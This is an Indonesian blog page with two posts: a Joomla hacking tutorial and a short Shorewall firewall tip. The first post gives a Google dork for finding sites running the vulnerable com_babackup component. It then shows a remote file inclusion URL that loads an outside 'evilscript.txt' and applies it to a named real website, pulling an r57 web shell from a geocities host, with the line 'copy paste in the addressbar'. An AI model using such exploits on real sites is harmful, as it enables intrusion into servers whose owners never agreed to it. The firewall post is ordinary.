March 30, 2008

Bugs On Joomla

Filed under: Bugs

Disini adalah contoh bugs yang terdapat pada CMS joomla di bagian "babackup" component joomla.

caranya mudah kok supaya bisa memakai bug itu cari aja software or components yang bersangkutan trus samain deh dengan bugnya .

http://www.milw0rm.com/exploits/2225 << dari sini kita bisa liat componenst yang berbug adalah com_babackup

nah kita pake key ini aja inurl:com_babackup
yang di dapat dari  google.com
Index of /english/components/com_babackup
Index of /english/components/com_babackup. Name Last modified Size Description. Parent Directory 24-Jul-2007 10:13 -
www.myenglishgrammar.com/english/components/com_babackup/ - 1k - Tembolok - Halaman sejenis
xixi
coba kita samain dengan bug ya
Exploit:
http://www.site.com/[path]/administrator/components/
com_babackup/classes/Tar.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

ok kita implementasikan ke site target tadi yang udah kita dapet di google
www.myenglishgrammar.com/english/administrator/components/
com_babackup/classes/Tar.php?mosConfig_absolute_path=
http://geocities.com/home_edition2001/r57.txt? 

Tinggal copy paste di Addresbar dan coba liat hasilnya. Kalo beruntung bisa masuk lahh tuh exploit 

March 29, 2008

Blok IP Local Dengan Shorewall

Filed under: Linux

Untuk memblok IP local supaya tidak bisa akses ke Internet masukkan:

REJECT     loc:192.168.1.12  net      all
Masukkan rules di atas  pada /etc/shorewall/rules setelah itu tinggal restart shorewall
 
Sumber : http://lists.shorewall.net/pipermail/shorewall-users/2005-May/018612.html